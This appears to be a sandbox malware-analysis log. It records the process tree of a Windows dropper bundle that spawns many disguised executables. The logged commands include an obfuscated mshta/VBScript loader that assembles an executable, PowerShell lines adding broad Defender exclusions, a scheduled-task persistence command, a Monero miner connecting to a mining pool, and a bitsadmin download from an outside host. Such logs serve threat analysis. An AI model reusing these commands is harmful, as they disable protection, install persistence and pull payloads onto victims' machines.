C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT( "wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 8128⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 8408⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 8888⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 9088⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 9568⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 10128⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"9⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x238,0x23c,0x240,0x214,0x244,0x7ffb789adec0,0x7ffb789aded0,0x7ffb789adee010⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x134,0x138,0x13c,0x110,0x140,0x7ff7d98a9e70,0x7ff7d98a9e80,0x7ff7d98a9e9011⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1536 /prefetch:210⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --mojo-platform-channel-handle=1936 /prefetch:810⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --mojo-platform-channel-handle=2232 /prefetch:810⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2636 /prefetch:110⤵
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=1844 /prefetch:110⤵
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --mojo-platform-channel-handle=2940 /prefetch:810⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3208 /prefetch:210⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --mojo-platform-channel-handle=3696 /prefetch:810⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --mojo-platform-channel-handle=3580 /prefetch:810⤵
- Suspicious use of SetThreadContext
- Modifies system certificate store
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --mojo-platform-channel-handle=1864 /prefetch:810⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --mojo-platform-channel-handle=3136 /prefetch:810⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --mojo-platform-channel-handle=3492 /prefetch:810⤵
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
- Drops file in System32 directory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit9⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"10⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"10⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
-
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe10⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"11⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit12⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"13⤵
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"12⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14514904a4b.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat14514904a4b.exeSat14514904a4b.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat142ac5249376e895.exeSat142ac5249376e895.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1487ca754e680f91.exeSat1487ca754e680f91.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\x6z6NjXcCh4bSMjVQsnzBW81.exe"C:\Users\Admin\Pictures\Adobe Films\x6z6NjXcCh4bSMjVQsnzBW81.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\Hucq3cRU783T_YaR6f0rcMBe.exe"C:\Users\Admin\Pictures\Adobe Films\Hucq3cRU783T_YaR6f0rcMBe.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\79BLy9HRraJ1saUAfrFwsTrz.exe"C:\Users\Admin\Documents\79BLy9HRraJ1saUAfrFwsTrz.exe"7⤵
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\Ks9QPIhrFFITQDkoX2Ao_qgs.exe"C:\Users\Admin\Pictures\Adobe Films\Ks9QPIhrFFITQDkoX2Ao_qgs.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\sfsmPN2Q4HWLk0HKJjUxzpM2.exe"C:\Users\Admin\Pictures\Adobe Films\sfsmPN2Q4HWLk0HKJjUxzpM2.exe" /mixtwo8⤵
-
C:\Users\Admin\Pictures\Adobe Films\4sJmy4OYqmAdZtWjrOficbSi.exe"C:\Users\Admin\Pictures\Adobe Films\4sJmy4OYqmAdZtWjrOficbSi.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\I1yxyBjCi2rjqqaotCgEwtTy.exe"C:\Users\Admin\Pictures\Adobe Films\I1yxyBjCi2rjqqaotCgEwtTy.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\yoX1lbJjB0CYEqqcW6Y2Yb_p.exe"C:\Users\Admin\Pictures\Adobe Films\yoX1lbJjB0CYEqqcW6Y2Yb_p.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\Vo1z98SLibb53bBUs5I2fSxG.exe"C:\Users\Admin\Pictures\Adobe Films\Vo1z98SLibb53bBUs5I2fSxG.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\Vo1z98SLibb53bBUs5I2fSxG.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\Vo1z98SLibb53bBUs5I2fSxG.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\Vo1z98SLibb53bBUs5I2fSxG.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\Vo1z98SLibb53bBUs5I2fSxG.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "Vo1z98SLibb53bBUs5I2fSxG.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\aDm5wtNVVBVZLktXPpIsLYMC.exe"C:\Users\Admin\Pictures\Adobe Films\aDm5wtNVVBVZLktXPpIsLYMC.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-3QBEU.tmp\aDm5wtNVVBVZLktXPpIsLYMC.tmp"C:\Users\Admin\AppData\Local\Temp\is-3QBEU.tmp\aDm5wtNVVBVZLktXPpIsLYMC.tmp" /SL5="$1044C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\aDm5wtNVVBVZLktXPpIsLYMC.exe"9⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-EBTHO.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-EBTHO.tmp\DYbALA.exe" /S /UID=270910⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\72-e098e-f8a-0809b-eff097f323a7b\Titalelome.exe"C:\Users\Admin\AppData\Local\Temp\72-e098e-f8a-0809b-eff097f323a7b\Titalelome.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kr1ib4i5.bq0\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\kr1ib4i5.bq0\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\kr1ib4i5.bq0\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10032 -s 66414⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ah2ezu0k.ozd\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\ah2ezu0k.ozd\installer.exeC:\Users\Admin\AppData\Local\Temp\ah2ezu0k.ozd\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0fohaslt.lqz\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\0fohaslt.lqz\any.exeC:\Users\Admin\AppData\Local\Temp\0fohaslt.lqz\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fxwco1eu.14j\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\fxwco1eu.14j\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\fxwco1eu.14j\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8716 -s 64814⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8716 -s 66414⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8716 -s 62414⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8716 -s 64414⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uganmcft.qiu\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\uganmcft.qiu\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\uganmcft.qiu\autosubplayer.exe /S13⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pcKaq2Eq28KXYPtY -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pIpp1OPsBdTop3OU -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
[depth 14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"
[depth 14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"
[depth 14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"
[depth 14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"
[depth 14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"
[depth 14] C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\BtWbiTx\BtWbiTx.dll" BtWbiTx
[depth 15] C:\Windows\system32\rundll32.exe
  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\BtWbiTx\BtWbiTx.dll" BtWbiTx
  - Drops file in System32 directory
[depth 14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"
[depth 14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"
[depth 14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"
[depth 14] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"
[depth 14] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"
[depth 14] C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
  "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
[depth 8] C:\Users\Admin\Pictures\Adobe Films\hffvrbh7XobMbZCDBVzFhfbk.exe
  "C:\Users\Admin\Pictures\Adobe Films\hffvrbh7XobMbZCDBVzFhfbk.exe"
[depth 9] C:\Users\Admin\AppData\Roaming\3639131.exe
  "C:\Users\Admin\AppData\Roaming\3639131.exe"
[depth 9] C:\Users\Admin\AppData\Roaming\8217699.exe
  "C:\Users\Admin\AppData\Roaming\8217699.exe"
[depth 10] C:\Users\Admin\AppData\Roaming\8217699.exe
  "C:\Users\Admin\AppData\Roaming\8217699.exe"
  - Suspicious use of SetWindowsHookEx
